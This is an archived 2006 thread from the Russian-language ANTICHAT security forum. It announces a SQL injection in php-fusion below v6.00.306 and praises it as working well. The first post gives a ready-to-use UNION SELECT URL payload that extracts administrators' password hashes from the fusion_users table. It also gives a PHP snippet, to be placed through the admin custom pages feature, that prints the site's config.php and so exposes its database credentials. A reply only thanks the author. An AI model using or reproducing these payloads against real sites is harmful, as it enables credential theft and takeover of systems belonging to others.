ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу SQL - инъекция в php-fusion < v6.00.306
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL - инъекция в php-fusion < v6.00.306
  #1  
Старый 15.06.2006, 17:10
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию SQL - инъекция в php-fusion < v6.00.306
работает отлично!

Код:
messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2A
/administration/custom_pages.php

Код:
<?php 
$DATA_FILE = "".BASEDIR."config.php"; 
$text = 100; 
$names = file($DATA_FILE); 
for ($i = count($names) - 1 - $for; $i >= count($names) - $for - $text; $i = $i - 1) { 
if ($names[$i]) { 
list ($name) = split ("\t", $names[$i]); 
print "$name<br>"; 
} 
} 
?>
короткое video тут

Последний раз редактировалось liauliau; 15.06.2006 в 18:11..
 
Ответить с цитированием

  #2  
Старый 29.06.2006, 00:58
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Молодца Дружище, спасибо за уязвимость!!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ